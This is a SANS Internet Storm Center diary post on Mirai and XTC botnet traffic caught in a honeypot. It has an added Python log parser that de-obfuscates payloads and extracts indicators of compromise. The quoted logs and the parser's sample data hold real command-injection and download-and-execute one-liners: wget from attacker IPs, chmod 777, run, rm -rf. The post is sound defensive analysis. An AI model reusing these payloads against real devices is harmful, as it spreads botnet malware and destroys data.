Mirai Botnet Activity, (Sat, Jun 13th)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The file hosted at the IP in the first log (96.30.193.26) appears to have been taken down; that IP appeared multiple times this week, including today. However, the download site in the last two logs from today is still active and serves a Bash script that downloads multiple exploits targeting various device architectures (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent XTC and the name viktor, which appear to be linked to the XTC IRC botnet, aka Hoaxcalls.

  • 20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
  • 20200613-101617: 192.168.25.9:8088-36.82.97.160:33090 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
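
As an added example (not code from the diary), a small Python parser that reads honeypot lines in the format shown above, undoes the ${IFS} whitespace obfuscation, flags the download-and-execute chain, and collects the IoCs from the flagged lines. The log layout (honeypot ip:port first, attacking host second), the stage names and the abridged sample lines are assumptions constructed for this example.

```python
import re
# Constructed samples, abridged from the honeypot entries above with \r\n restored.
# Assumed layout: honeypot ip:port first, then the attacking host ip:port.
SAMPLE_LOGS = [
    "20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data 'POST /cgi-bin/mainfunction.cgi "
    "HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1\r\n\r\naction=login&keyPath='wget${IFS}"
    "http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;"
    "${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'",
    "20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data 'cd /tmp; wget "
    "http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'",
]
LINE_RE = re.compile(r"^(\d{8}-\d{6}): ([\d.]+):(\d+)-([\d.]+):(\d+) data '(.*)'$", re.S)
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s;'\"&]*")
UA_RE = re.compile(r"User-Agent:\s*([^\r\n]+)")
# Stages of the typical IoT loader one-liner: fetch, mark executable, run, wipe.
STAGES = {
    "download": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b"),
    "execute": re.compile(r"(?:^|[;&|])\s*(?:sh\s+\S+|\./\S+|/tmp/\S+)"),
    "cleanup": re.compile(r"\brm\s+-rf\b"),
}

def analyze(line):
    """Parse one honeypot line; None if it does not match the log format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, hp_ip, hp_port, src_ip, src_port, raw = m.groups()
    payload = raw.replace("${IFS}", " ")  # undo the ${IFS}-for-space trick
    ua = UA_RE.search(payload)
    stages = [name for name, rx in STAGES.items() if rx.search(payload)]
    return {
        "timestamp": ts, "honeypot": f"{hp_ip}:{hp_port}", "source": f"{src_ip}:{src_port}",
        "user_agent": ua.group(1).strip() if ua else None,
        "urls": URL_RE.findall(payload), "stages": stages,
        # Fetch plus execute inside a single request is the loader signature.
        "suspicious": {"download", "execute"} <= set(stages),
    }

def extract_iocs(lines):
    """Aggregate unique download URLs, attacker IPs and User-Agents from flagged lines."""
    iocs = {"urls": set(), "sources": set(), "user_agents": set()}
    for r in filter(None, map(analyze, lines)):
        if r["suspicious"]:
            iocs["urls"].update(r["urls"])
            iocs["sources"].add(r["source"].rsplit(":", 1)[0])
            if r["user_agent"]:
                iocs["user_agents"].add(r["user_agent"])
    return iocs
```

Running `extract_iocs(SAMPLE_LOGS)` yields the two download URLs, the two attacking IPs and the XTC User-Agent listed in the Indicators of Compromise below.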

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspicious Files and Scripts:

  • UnHAnaAW.sh4 – 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • 8UsA.sh – 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=115.85.32.210
[5] https://isc.sans.edu/ipinfo.html?ip=185.172.111.214
[6] https://isc.sans.edu/ipinfo.html?ip=96.30.193.26
[7] https://isc.sans.edu/ipinfo.html?ip=36.82.97.160

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.